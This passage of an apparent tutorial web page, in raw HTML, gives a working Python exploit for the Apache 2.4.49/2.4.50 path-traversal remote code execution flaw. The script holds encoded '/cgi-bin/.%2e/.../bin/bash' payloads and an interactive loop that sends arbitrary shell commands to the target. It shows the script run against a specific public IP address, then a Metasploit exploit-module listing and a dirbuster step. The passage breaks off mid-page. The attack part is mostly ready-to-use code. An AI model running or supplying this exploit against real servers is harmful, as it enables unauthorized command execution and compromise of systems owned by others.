class="n">RESET_ALL</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">2</span> <span class="p">:</span> <span class="nf">print</span><span class="p">(</span> <span class="sh">'</span><span class="s">Use: python3 file.py ip:port </span><span class="sh">'</span> <span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">()</span> <span class="k">def</span> <span class="nf">end</span><span class="p">():</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\t\033</span><span class="s">[1;91m[!] Bye bye !</span><span class="sh">"</span><span class="p">)</span> <span class="n">time</span><span class="p">.</span><span class="nf">sleep</span><span class="p">(</span><span class="mf">0.5</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="k">def</span> <span class="nf">commands</span><span class="p">(</span><span class="n">url</span><span class="p">,</span><span class="n">command</span><span class="p">,</span><span class="n">session</span><span class="p">):</span> <span class="n">directory</span> <span class="o">=</span> <span class="nf">mute_command</span><span class="p">(</span><span class="n">url</span><span class="p">,</span><span class="sh">'</span><span class="s">pwd</span><span class="sh">'</span><span class="p">)</span> <span class="n">user</span> <span class="o">=</span> <span class="nf">mute_command</span><span class="p">(</span><span class="n">url</span><span class="p">,</span><span class="sh">'</span><span class="s">whoami</span><span class="sh">'</span><span class="p">)</span> <span class="n">hostname</span> <span class="o">=</span> <span class="nf">mute_command</span><span class="p">(</span><span class="n">url</span><span class="p">,</span><span class="sh">'</span><span class="s">hostname</span><span class="sh">'</span><span class="p">)</span> <span class="n">advise</span> <span class="o">=</span> <span class="nf">print</span><span class="p">(</span><span class="n">Fore</span><span class="p">.</span><span class="n">YELLOW</span> <span class="o">+</span> <span class="sh">'</span><span class="s">Reverse shell is advised (This isn</span><span class="se">\'</span><span class="s">t an interactive shell)</span><span class="sh">'</span><span class="p">)</span> <span class="n">command</span> <span class="o">=</span> <span class="nf">input</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">Fore</span><span class="p">.</span><span class="n">RED</span><span class="si">}</span><span class="s">╭─</span><span class="si">{</span><span class="n">Fore</span><span class="p">.</span><span class="n">GREEN</span> <span class="o">+</span> <span class="n">user</span><span class="si">}</span><span class="s">@</span><span class="si">{</span><span class="n">hostname</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="n">Fore</span><span class="p">.</span><span class="n">BLUE</span> <span class="o">+</span> <span class="n">directory</span><span class="si">}</span><span class="se">\n</span><span class="si">{</span><span class="n">Fore</span><span class="p">.</span><span class="n">RED</span><span class="si">}</span><span class="s">╰─</span><span class="si">{</span><span class="n">Fore</span><span class="p">.</span><span class="n">YELLOW</span><span class="si">}</span><span class="s">$ </span><span class="si">{</span><span class="n">Style</span><span class="p">.</span><span class="n">RESET_ALL</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">command</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">echo; </span><span class="si">{</span><span class="n">command</span><span class="si">}</span><span class="s">;</span><span class="sh">"</span> <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Request</span><span class="p">(</span><span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">,</span> <span class="n">url</span><span class="o">=</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">command</span><span class="p">)</span> <span class="n">prepare</span> <span class="o">=</span> <span class="n">req</span><span class="p">.</span><span class="nf">prepare</span><span class="p">()</span> <span class="n">prepare</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="n">url</span> <span class="n">response</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">prepare</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">)</span> <span class="n">output</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span> <span class="nf">print</span><span class="p">(</span><span class="n">output</span><span class="p">)</span> <span class="k">if</span> <span class="sh">'</span><span class="s">clear</span><span class="sh">'</span> <span class="ow">in</span> <span class="n">command</span><span class="p">:</span> <span class="n">os</span><span class="p">.</span><span class="nf">system</span><span class="p">(</span><span class="sh">'</span><span class="s">/usr/bin/clear</span><span class="sh">'</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">header</span><span class="p">)</span> <span class="k">if</span> <span class="sh">'</span><span class="s">exit</span><span class="sh">'</span> <span class="ow">in</span> <span class="n">command</span><span class="p">:</span> <span class="nf">end</span><span class="p">()</span> <span class="k">def</span> <span class="nf">mute_command</span><span class="p">(</span><span class="n">url</span><span class="p">,</span><span class="n">command</span><span class="p">):</span> <span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Session</span><span class="p">()</span> <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Request</span><span class="p">(</span><span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">,</span> <span class="n">url</span><span class="o">=</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="sa">f</span><span class="sh">"</span><span class="s">echo; </span><span class="si">{</span><span class="n">command</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">prepare</span> <span class="o">=</span> <span class="n">req</span><span class="p">.</span><span class="nf">prepare</span><span class="p">()</span> <span class="n">prepare</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="n">url</span> <span class="n">response</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">prepare</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">)</span> <span class="k">return</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">.</span><span class="nf">strip</span><span class="p">()</span> <span class="k">def</span> <span class="nf">exploitRCE</span><span class="p">(</span><span class="n">payload</span><span class="p">):</span> <span class="n">s</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Session</span><span class="p">()</span> <span class="k">try</span><span class="p">:</span> <span class="n">host</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">if</span> <span class="sh">'</span><span class="s">http</span><span class="sh">'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">host</span><span class="p">:</span> <span class="n">url</span> <span class="o">=</span> <span class="sh">'</span><span class="s">http://</span><span class="sh">'</span><span class="o">+</span> <span class="n">host</span> <span class="o">+</span> <span class="n">payload</span> <span class="k">else</span><span class="p">:</span> <span class="n">url</span> <span class="o">=</span> <span class="n">host</span> <span class="o">+</span> <span class="n">payload</span> <span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Session</span><span class="p">()</span> <span class="n">command</span> <span class="o">=</span> <span class="sh">"</span><span class="s">echo; id</span><span class="sh">"</span> <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Request</span><span class="p">(</span><span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">,</span> <span class="n">url</span><span class="o">=</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">command</span><span class="p">)</span> <span class="n">prepare</span> <span class="o">=</span> <span class="n">req</span><span class="p">.</span><span class="nf">prepare</span><span class="p">()</span> <span class="n">prepare</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="n">url</span> <span class="n">response</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">prepare</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">)</span> <span class="n">output</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span> <span class="k">if</span> <span class="sh">"</span><span class="s">uid</span><span class="sh">"</span> <span class="ow">in</span> <span class="n">output</span><span class="p">:</span> <span class="n">choice</span> <span class="o">=</span> <span class="sh">"</span><span class="s">Y</span><span class="sh">"</span> <span class="nf">print</span><span class="p">(</span> <span class="n">Fore</span><span class="p">.</span><span class="n">GREEN</span> <span class="o">+</span> <span class="sh">'</span><span class="se">\n</span><span class="s">[!] Target %s is vulnerable !!!</span><span class="sh">'</span> <span class="o">%</span> <span class="n">host</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">[!] Sortie:</span><span class="se">\n\n</span><span class="sh">"</span> <span class="o">+</span> <span class="n">Fore</span><span class="p">.</span><span class="n">YELLOW</span> <span class="o">+</span> <span class="n">output</span> <span class="p">)</span> <span class="n">choice</span> <span class="o">=</span> <span class="nf">input</span><span class="p">(</span><span class="n">Fore</span><span class="p">.</span><span class="n">CYAN</span> <span class="o">+</span> <span class="sh">"</span><span class="s">[?] Do you want to exploit this RCE ? (Y/n) : </span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">choice</span><span class="p">.</span><span class="nf">lower</span><span class="p">()</span> <span class="ow">in</span> <span class="p">[</span><span class="sh">''</span><span class="p">,</span><span class="sh">'</span><span class="s">y</span><span class="sh">'</span><span class="p">,</span><span class="sh">'</span><span class="s">yes</span><span class="sh">'</span><span class="p">]:</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="nf">commands</span><span class="p">(</span><span class="n">url</span><span class="p">,</span><span class="n">command</span><span class="p">,</span><span class="n">session</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="nf">end</span><span class="p">()</span> <span class="k">else</span> <span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="n">Fore</span><span class="p">.</span><span class="n">RED</span> <span class="o">+</span> <span class="sh">'</span><span class="se">\n</span><span class="s">Target %s isn</span><span class="se">\'</span><span class="s">t vulnerable</span><span class="sh">'</span> <span class="o">%</span> <span class="n">host</span><span class="p">)</span> <span class="k">except</span> <span class="nb">KeyboardInterrupt</span><span class="p">:</span> <span class="nf">end</span><span class="p">()</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="k">try</span><span class="p">:</span> <span class="n">apache2449_payload</span> <span class="o">=</span> <span class="sh">'</span><span class="s">/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash</span><span class="sh">'</span> <span class="n">apache2450_payload</span> <span class="o">=</span> <span class="sh">'</span><span class="s">/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash</span><span class="sh">'</span> <span class="n">payloads</span> <span class="o">=</span> <span class="p">[</span><span class="n">apache2449_payload</span><span class="p">,</span><span class="n">apache2450_payload</span><span class="p">]</span> <span class="n">choice</span> <span class="o">=</span> <span class="nf">len</span><span class="p">(</span><span class="n">payloads</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="nf">print</span><span class="p">(</span><span class="n">header</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\033</span><span class="s">[1;37m[0] Apache 2.4.49 RCE</span><span class="se">\n</span><span class="s">[1] Apache 2.4.50 RCE</span><span class="sh">"</span><span class="p">)</span> <span class="k">while</span> <span class="n">choice</span> <span class="o">&gt;=</span> <span class="nf">len</span><span class="p">(</span><span class="n">payloads</span><span class="p">)</span> <span class="ow">and</span> <span class="n">choice</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">:</span> <span class="n">choice</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="nf">input</span><span class="p">(</span><span class="sh">'</span><span class="s">[~] Choice : </span><span class="sh">'</span><span class="p">))</span> <span class="k">if</span> <span class="n">choice</span> <span class="o">&lt;</span> <span class="nf">len</span><span class="p">(</span><span class="n">payloads</span><span class="p">):</span> <span class="nf">exploitRCE</span><span class="p">(</span><span class="n">payloads</span><span class="p">[</span><span class="n">choice</span><span class="p">])</span> <span class="k">except</span> <span class="nb">KeyboardInterrupt</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n\033</span><span class="s">[1;91m[!] Bye bye !</span><span class="sh">"</span><span class="p">)</span> <span class="n">time</span><span class="p">.</span><span class="nf">sleep</span><span class="p">(</span><span class="mf">0.5</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">'</span><span class="s">__main__</span><span class="sh">'</span><span class="p">:</span> <span class="nf">main</span><span class="p">()</span> </code></pre> </div> <h2> Let's to run file </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 Explot.py </code></pre> </div> <p>Use: <code>python3 file.py ip:port</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 Explot.py 145.14.145.161:80 </code></pre> </div> <h2> Use metasploit to exploit </h2> <p>run <code>msfconsole</code> in your terminal<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>msfconsole </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> .:okOOOkdc<span class="s1">' '</span>cdkOOOko:. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO: <span class="s1">'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'</span> oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx lOOOOOOOO. <span class="p">;</span>d<span class="p">;</span> ,OOOOOOOOl .OOOOOOOO. .<span class="p">;</span> <span class="p">;</span> ,OOOOOOOO. cOOOOOOO. .OOc. <span class="s1">'oOO. ,OOOOOOOc oOOOOOO. .OOOO. :OOOO. ,OOOOOOo lOOOOO. .OOOO. :OOOO. ,OOOOOl ;OOOO'</span> .OOOO. :OOOO. <span class="p">;</span>OOOO<span class="p">;</span> .dOOo .OOOOocccxOOOO. xOOd. ,kOl .OOOOOOOOOOOOO. .dOk, :kk<span class="p">;</span>.OOOOOOOOOOOOO.cOk: <span class="p">;</span>kOOOOOOOOOOOOOOOk: ,xOOOOOOOOOOOx, .lOOOOOOOl. ,dOd, <span class="nb">.</span> <span class="o">=[</span> metasploit v6.3.5-dev <span class="o">]</span> + <span class="nt">--</span> <span class="nt">--</span><span class="o">=[</span> 2296 exploits - 1202 auxiliary - 410 post <span class="o">]</span> + <span class="nt">--</span> <span class="nt">--</span><span class="o">=[</span> 962 payloads - 45 encoders - 11 nops <span class="o">]</span> + <span class="nt">--</span> <span class="nt">--</span><span class="o">=[</span> 9 evasion <span class="o">]</span> Metasploit tip: Save the current environment with the save <span class="nb">command</span>, future console restarts will use this environment again Metasploit Documentation: https://docs.metasploit.com/ msf6 <span class="o">&gt;</span> search exploit </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Matching Modules <span class="o">================</span> <span class="c"># Name Disclosure Date Rank Check Description</span> - <span class="nt">----</span> <span class="nt">---------------</span> <span class="nt">----</span> <span class="nt">-----</span> <span class="nt">-----------</span> 0 auxiliary/dos/http/cable_haunt_websocket_dos 2020-01-07 normal No <span class="s2">"Cablehaunt"</span> Cable Modem WebSocket DoS 1 exploit/windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow 2 exploit/windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow 3 exploit/windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow 4 exploit/windows/scada/igss9_misc 2011-03-24 excellent No 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities 5 exploit/windows/scada/igss9_igssdataserver_rename 2011-03-24 normal No 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow 6 exploit/windows/scada/igss9_igssdataserver_listall 2011-03-24 good No 7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow 7 exploit/windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow 8 auxiliary/scanner/http/a10networks_ax_directory_traversal 2014-01-28 normal No A10 Networks AX Loadbalancer Directory Traversal 9 exploit/windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 <span class="o">(</span>Win32<span class="o">)</span> Stack Buffer Overflow <span class="o">(</span>LIST<span class="o">)</span> 10 exploit/windows/scada/abb_wserver_exec 2013-04-05 excellent Yes ABB MicroSCADA wserver.exe Remote Code Execution 11 exploit/windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow 12 exploit/linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation 13 exploit/linux/local/abrt_sosreport_priv_esc 2015-11-23 excellent Yes ABRT sosreport Privilege Escalation 14 exploit/windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File <span class="nb">id </span>Parameter Overflow 15 exploit/windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow 16 exploit/linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation 17 exploit/linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation 18 exploit/windows/sip/aim_triton_cseq 2006-07-10 great No AIM Triton 1.0.4 CSeq Buffer Overflow 19 exploit/windows/misc/ais_esel_server_rce 2019-03-27 excellent Yes AIS logistics ESEL-Server Unauth SQL Injection RCE 20 exploit/aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon <span class="o">(</span>rpc.cmsd<span class="o">)</span> Opcode 21 Buffer Overflow 21 exploit/windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow 22 exploit/windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow 23 exploit/windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import<span class="o">()</span> Stack-based Buffer Overflow 24 exploit/windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow 25 exploit/windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow 26 exploit/windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile<span class="o">()</span> Buffer Overflow 27 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence 28 exploit/windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow 29 exploit/linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution 30 exploit/linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution 31 exploit/multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution 32 exploit/multi/http/atutor_upload_traversal 2019-05-17 excellent Yes ATutor 2.2.4 - Directory Traversal / Remote Code Execution, 33 exploit/unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution 34 exploit/unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution 35 exploit/unix/webapp/awstats_migrate_exec <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> <span class="nb">.</span> 2454 exploit/windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow 2455 exploit/windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow 2456 exploit/windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow 2457 exploit/linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection 2458 exploit/windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow <span class="k">in </span>QUO 2459 exploit/multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability 2460 exploit/windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow 2461 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection 2462 exploit/windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow 2463 exploit/windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow 2464 exploit/windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow 2465 exploit/linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc <span class="s1">'$ORIGIN'</span> Expansion Privilege Escalation 2466 exploit/linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc <span class="s1">'realpath()'</span> Privilege Escalation 2467 exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation 2468 exploit/windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow 2469 auxiliary/dos/apple_ios/webkit_backdrop_filter_blur 2018-09-15 normal No iOS Safari Denial of Service with CSS 2470 exploit/windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation 2471 exploit/aix/local/ibstat_path 2013-09-24 excellent Yes ibstat <span class="nv">$PATH</span> Privilege Escalation 2472 exploit/qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation 2473 exploit/windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow 2474 exploit/linux/local/ktsuss_suid_priv_esc 2011-08-13 excellent Yes ktsuss suid Privilege Escalation 2475 exploit/linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 excellent Yes lastore-daemon D-Bus Privilege Escalation 2476 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner 2477 exploit/windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow 2478 exploit/windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow 2479 exploit/osx/browser/osx_gatekeeper_bypass 2021-03-25 manual No macOS Gatekeeper check bypass 2480 exploit/osx/local/cfprefsd_race_condition 2020-03-18 excellent Yes macOS cfprefsd Arbitrary File Write Local Privilege Escalation 2481 auxiliary/dos/http/marked_redos normal No marked npm module <span class="s2">"heading"</span> ReDoS 2482 exploit/unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution 2483 exploit/linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution 2484 exploit/unix/webapp/opensis_chain_exec 2020-06-30 excellent Yes openSIS Unauthenticated PHP Code Execution 2485 exploit/unix/webapp/oscommerce_filemanager 2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution 2486 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution 2487 auxiliary/sniffer/psnuffle normal No pSnuffle Packet Sniffer 2488 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE 2489 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE 2490 exploit/linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution 2491 exploit/unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution 2492 exploit/unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload 2493 exploit/multi/http/phpfilemanager_rce 2015-08-28 excellent Yes phpFileManager 0.9.8 Remote Code Execution 2494 exploit/multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection 2495 exploit/multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor 2496 exploit/multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution 2497 exploit/multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution 2498 exploit/multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace<span class="o">()</span> 2499 exploit/multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection 2500 exploit/linux/local/ptrace_sudo_token_priv_esc 2019-03-24 excellent Yes ptrace Sudo Token Privilege Escalation 2501 exploit/multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability 2502 exploit/unix/webapp/rconfig_install_cmd_exec 2019-10-28 excellent Yes rConfig <span class="nb">install </span>Command Execution 2503 exploit/linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence 2504 exploit/unix/http/tnftp_savefile 2014-10-28 excellent No tnftp <span class="s2">"savefile"</span> Arbitrary Command Execution 2505 auxiliary/dos/http/ua_parser_js_redos normal No ua-parser-js npm module ReDoS 2506 exploit/multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution 2507 exploit/multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO proc_deutf<span class="o">()</span> Remote PHP Code Injection 2508 auxiliary/gather/vbulletin_getindexablecontent_sqli 2020-03-12 normal No vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection 2509 exploit/multi/http/vbulletin_getindexablecontent 2020-03-12 manual Yes vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection 2510 exploit/multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution 2511 exploit/multi/http/vbulletin_widget_template_rce 2020-08-09 excellent Yes vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution. 2512 auxiliary/admin/http/vbulletin_upgrade_admin 2013-10-09 normal No vBulletin Administrator Account Creation 2513 auxiliary/gather/vbulletin_vote_sqli 2013-03-24 normal Yes vBulletin Password Collector via nodeid SQL Injection 2514 exploit/unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection 2515 exploit/unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution 2516 exploit/multi/http/vbulletin_widgetconfig_rce 2019-09-23 excellent Yes vBulletin widgetConfig RCE 2517 exploit/multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload 2518 exploit/multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution 2519 exploit/multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution 2520 auxiliary/dos/http/ws_dos normal No ws - Denial of Service 2521 exploit/windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow 2522 exploit/unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution Interact with a module by name or index. For example info 2522, use 2522 or use exploit/unix/http/xdebug_unauth_exec </code></pre> </div> <h2> Use Owasp dirbuster </h2> <br> Lauch dirbuster<br> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>dirbuster </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm1x0ejs0v5nfwn8j0mtz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm1x0ejs0v5nfwn8j0mtz.png" alt=" " width="771" height="547"></a><br> complete the information.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwapn0llpubslvtkxgzt8.png" class="article-body-image-wrapper"><img 